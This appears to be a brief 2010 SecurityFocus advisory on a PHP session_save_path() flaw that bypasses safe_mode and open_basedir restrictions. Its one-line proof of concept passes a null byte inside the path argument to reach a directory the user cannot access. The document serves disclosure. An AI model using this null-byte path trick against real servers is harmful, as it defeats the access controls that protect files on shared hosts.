PHP Session.Save_Path() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability

Attackers may exploit these issues with standard PHP code.

The following proof of concept is available:

session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS");


 

Copyright 2010, SecurityFocus